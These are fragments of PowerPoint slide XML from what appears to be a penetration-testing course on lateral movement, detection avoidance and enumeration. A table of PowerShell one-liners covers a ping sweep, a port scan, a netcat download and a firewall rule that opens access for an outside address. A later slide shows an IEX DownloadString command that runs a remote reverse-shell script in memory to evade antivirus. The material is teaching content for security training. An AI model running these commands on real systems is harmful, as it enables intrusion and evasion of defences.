                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Exports output to a comma-separated values (CSV) file</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3057892287"/>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dirty="0"/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25725766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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="925183"/>
            <a:ext cx="8786001" cy="2280608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>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dirty="0"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Tabela 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3199DCD-4643-49C4-379B-963C86BB28A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="555928770"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="150962" y="841075"/>
          <a:ext cx="8835560" cy="4130040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4806731">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1414830880"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4028829">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1314350341"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>PowerShell Command</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3138939995"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>1..255 | % {echo "10.1.2.$_"; ping -n 1 -w 100 10.1.2.$_ | </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>SelectString</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>ttl</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Launches a ping sweep to the 10.1.2.0/24 network</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3889016744"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>1..1024 | % {echo ((new-object </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Net.Sockets.TcpClient</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>).Connect ("10.1.2.3",$_)) "Port $_ is open!"} 2&gt;$NULL</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Launches a port scan to the 10.1.2.3 hosts (scans for ports 1 through 1024)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3868594995"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>(New-object </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>System.Net.WebClient</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>).</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>DownloadFile</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> ("http://10.1.2.3/nc.exe", "nc.exe")</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Fetches a file via HTPP (similar to the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>wget</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> Linux command)</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3816093248"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Get-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>HotFix</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Obtains a list of all installed hotfixes</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3433902618"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>cd HKLM: \       </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> ls</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Navigates the Windows registry</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3909239564"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Get-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>NetFirewallRule</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> -all</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>New-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>NetFirewallRule</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> -Action Allow -DisplayName </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>LetMeIn</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> - </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>RemoteAddress</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> 10.6.6.6</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Lists and modifies the Windows firewall rules</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" noProof="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1147115551"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Get-Command</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Gets a list of all available commands</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1734481702"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86235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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10359F8A-B56A-3EB2-6C83-FB7410B44542}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472" y="1088571"/>
            <a:ext cx="8708571"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a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Cisco Sans"/>
                <a:cs typeface="Cisco Sans"/>
              </a:rPr>
              <a:t>The following PowerShell command can be used to avoid detection by security products and antivirus software:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>              PS &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>('http:// /Invoke-PowerShellTcp.ps1')</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Cisco Sans"/>
              <a:cs typeface="Cisco Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Cisco Sans"/>
                <a:cs typeface="Cisco Sans"/>
              </a:rPr>
              <a:t>This command directly loads a PS1 file from the Internet instead of downloading it and then executes it on the device.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri"/>
